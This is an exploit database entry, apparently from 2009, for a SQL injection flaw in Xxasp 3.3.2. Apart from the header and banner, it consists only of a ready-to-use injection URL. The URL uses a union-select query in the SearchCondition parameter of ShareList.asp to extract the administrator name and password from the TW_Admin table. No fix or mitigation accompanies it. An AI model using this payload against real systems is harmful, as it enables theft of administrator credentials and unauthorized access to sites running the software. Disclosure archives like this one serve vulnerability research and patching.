Xxasp 3.3.2 - SQL Injection

EDB-ID:

10254

CVE:





Platform:

ASP

Date:

2009-11-30


########################## Securitylab.ir ########################
# Application Info:
# Name: Xxasp
# Version: 3.3.2
#################################################################
# Discoverd By: Secu_lab_ir@yahoo.com
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
#===========================================================
# http://server/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
#===========================================================
#################################################################
# Security Research Team
###################################################################